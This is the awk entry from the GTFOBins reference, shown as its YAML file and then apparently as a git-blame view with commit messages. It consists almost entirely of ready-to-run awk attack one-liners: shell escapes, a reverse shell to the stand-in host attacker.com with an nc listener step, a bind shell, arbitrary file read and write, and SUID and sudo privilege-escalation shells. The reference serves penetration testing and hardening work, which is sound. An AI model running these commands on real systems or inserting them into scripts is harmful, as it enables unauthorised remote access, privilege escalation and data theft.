GTFOBins.github.io/_gtfobins/awk.md

---
functions:
  shell:
    - code: awk 'BEGIN {system("/bin/sh")}'
  non-interactive-reverse-shell:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        RHOST=attacker.com
        RPORT=12345
        awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
            s = "/inet/tcp/0/" RHOST "/" RPORT;
            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
  non-interactive-bind-shell:
    - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
      code: |
        LPORT=12345
        awk -v LPORT=$LPORT 'BEGIN {
            s = "/inet/tcp/" LPORT "/0/0";
            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
  file-write:
    - code: |
        LFILE=file_to_write
        awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
  file-read:
    - code: |
        LFILE=file_to_read
        awk '//' "$LFILE"
  suid:
    - code: |
        LFILE=file_to_read
        ./awk '//' "$LFILE"
  sudo:
    - code: sudo awk 'BEGIN {system("/bin/sh")}'
  limited-suid:
    - code: ./awk 'BEGIN {system("/bin/sh")}'
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: awk 'BEGIN {system("/bin/sh")}'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`non-interactive-reverse-shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
			`awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {`
			`s = "/inet/tcp/0/" RHOST "/" RPORT;`
			`while (1) {printf "> " \|& s; if ((s \|& getline c) <= 0) break;`
			`while (c && (c \|& getline) > 0) print $0 \|& s; close(c)}}'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`non-interactive-bind-shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
			`code: \|`
			`LPORT=12345`
			`awk -v LPORT=$LPORT 'BEGIN {`
			`s = "/inet/tcp/" LPORT "/0/0";`
			`while (1) {printf "> " \|& s; if ((s \|& getline c) <= 0) break;`
			`while (c && (c \|& getline) > 0) print $0 \|& s; close(c)}}'`
Add awk file-read/write 2018-05-28 20:11:21 +02:00			`file-write:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: \|`
			`LFILE=file_to_write`
Use DATA as a placeholder for file-write operations 2018-08-20 14:35:43 +02:00			`awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'`
Reorder functions in binaries 2018-07-04 20:26:52 +02:00			`file-read:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: \|`
			`LFILE=file_to_read`
			`awk '//' "$LFILE"`
Add SUID category to awk 2021-01-12 12:39:52 +01:00			`suid:`
Remove trailing space in awk.md line 31 2021-01-13 10:22:26 +01:00			`- code: \|`
Add SUID category to awk 2021-01-12 12:39:52 +01:00			`LFILE=file_to_read`
Add ./ to SUID category in awk.md 2021-01-18 08:44:34 +01:00			`./awk '//' "$LFILE"`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: sudo awk 'BEGIN {system("/bin/sh")}'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`limited-suid:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: ./awk 'BEGIN {system("/bin/sh")}'`
Add awk reverse shell 2018-05-22 23:55:01 +02:00			`---`